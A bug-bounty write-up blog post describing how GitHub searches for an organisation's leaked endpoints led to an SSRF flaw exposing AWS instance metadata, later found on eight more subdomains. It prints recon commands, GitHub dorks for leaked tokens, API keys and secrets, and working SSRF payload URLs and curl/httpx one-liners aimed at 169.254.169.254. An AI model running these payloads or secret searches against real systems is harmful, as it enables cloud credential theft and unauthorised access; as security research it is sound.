How Github recon help me to find NINE FULL SSRF Vulnerability with AWS metadata access

Hi, everyone

My name is Santosh Kumar Sha, I’m a security researcher from India(Assam). In this article, I will be describing how I was able to to find 9 full SSRF vulnerability with AWS metadata access BY doing some GITHUB recon.

I am now offering 1:1 sessions to share my knowledge and expertise:

topmate.io/santosh_kumar_sha

SPECIAL COVID-19 Note:

Don’t go outside without any reason . Stay home be safe and also safe other. Special request to my fellow bug-bounty hunter Take care of your health .

TOOLS used for the exploitation

1. Subfinder (https://github.com/projectdiscovery/subfinder)

2. httpx (https://github.com/projectdiscovery/httpx)

3. gau(Corben) — https://github.com/lc/gau

4. waybackurls(tomnomnom) — https://github.com/tomnomnom/waybackurls.

Story Behind the bug:

This is the write of my Recent bug that i found . While I was doing recon on GitHub. How i was able to find 9 ssrf vulnerability and I am not an expert in GitHub recon but like to find admin dashboard and path, endpoint on github. If you want to learn about GitHub recon follow @GodfatherOrwa and @th3g3nt3lman they are legend in github recon.

Here it goes:

Suppose we assume the target name is example.com where every thing is in-scope like this:

In-scope : *.example.com

To gather all the subdomain from internet archives i have used subfinder , waybackurls tool and gau.

Command used:

subfinder -d example.com silent

gau -subs example.com

waybackurls example.com

So the chance of missing the subdomain still exist so in-order to be ahead of the game I don’t want to miss any subdomain for testing so I used subfinder and pipe to waybackurls to get all the domain for all the subdomain if exist and save it to a file.

So the final command will look like this:

gau -subs example.com | unfurl domains>> vul1.txt

waybackurls example.com | unfurl domains >> vul2.txt

subfinder -d example.com -silent >> vul3.txt

Now collecting all subdomain in one and sorting out the duplicates

cat vul1.txt vul2.txt vul3.txt | sort -u >> unique_sub.txt

NOW the actual Github recon start:

Now as GitHub has a huge resource of data and doing GitHub recon is an time consume task to filter out the information the target. So I decided to target the user of the organization as the user of an organization the weakest link and the tendency of leaking secret by user it more. But the organization was huge and also have more than 200 user so search for each user it a time consume time and to filter out the information is huge. SO the syntax i used was like this below

“testdev.example.com” user:<username> <keytosearch>

“corps.example.com” user:<username> <keytosearch>

“test.example.com” user:<username> <keytosearch>

So I used some simple dorks like below but not leaked were found

“testdev.admin.example.com” user:<username> auth_token

“testdev.admin.example.com” user:<username> apikey

“testdev.admin.example.com” user:<username> secret

So i decided to search for path , endpoints and command used parameter and with the organization name along with path , endpoints and command used parameter as keywords. The GitHub dork was like below:

First i tried to find endpoint and path for admin and user dashboard

“corps.example.com” org:<name of organization> “/admin/dashboard”

“testdev.example.com” org:<name of organization> “/users/dashboard”

“example.com” org:<name of organization> “/admin/setup”

But I didn’t any an useful output from that.

Now I decided to look for some command user parameter just just to see what i am getting.

“example.com” org:<name of organization> “next_url”

“example.com” org:<name of organization> “img_url”

Still no success But when i use these parameter “image”

“example.com” org:<name of organization> “image”

I Show a path in the GitHub leaked by one of there in there commit section and the endpoint with the URL was like these below

/fetch/info?inquiry=&image_Host=https://example.com/user/

Now I just visited the urls in browser with my finger cross And it download a text file with all AWS internal metadata.

https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/

For simple i just used curl command to see the aws metadata

curl -sk “https://example.com/fetch/info?inquiry=&image_Host=http://169.254.169.254/

Now How I was able to find eight more ssrf :

I don’t know how it come to my mind to test this endpoint on other subdomain.As I have already collected the subdomain and stored it on a file name as “unique_sub.txt”.

cat unique_sub.txt | sort -u | httpx -silent -path “/fetch/info?inquiry=&image_Host=http://169.254.169.254/” -status-code -content-length

I Finally got 8 more SSRF by same path on different subdomain.

I quickly reported the bug and in the next day the report was triage to critical

After seeing this my reaction …

Takeaway

I’m sure that a lot of security researcher had already see there process but this how I approach for Finding endpoint on GitHub leaks by organization user and also GitHub it commit page also for unauthorized access or for finding some vulnerability by exploiting that endpoint leaked on GitHub

That’s one of the reasons why I wanted to share my experience. also to highlight other techniques to exploit such vulnerability.

Support me if you like my work! Buy me a coffee and Follow me on Twitter.

Thanks for reading :)
Stay Safe.

https://twitter.com/killmongar1996

--

--

Santosh Kumar Sha (@killmongar1996)

Cloud Security |Security Researcher |Pentester | Bugbounty hunter|VAPT | Pentration tester | CTF player | topmate.io/santosh_kumar_sha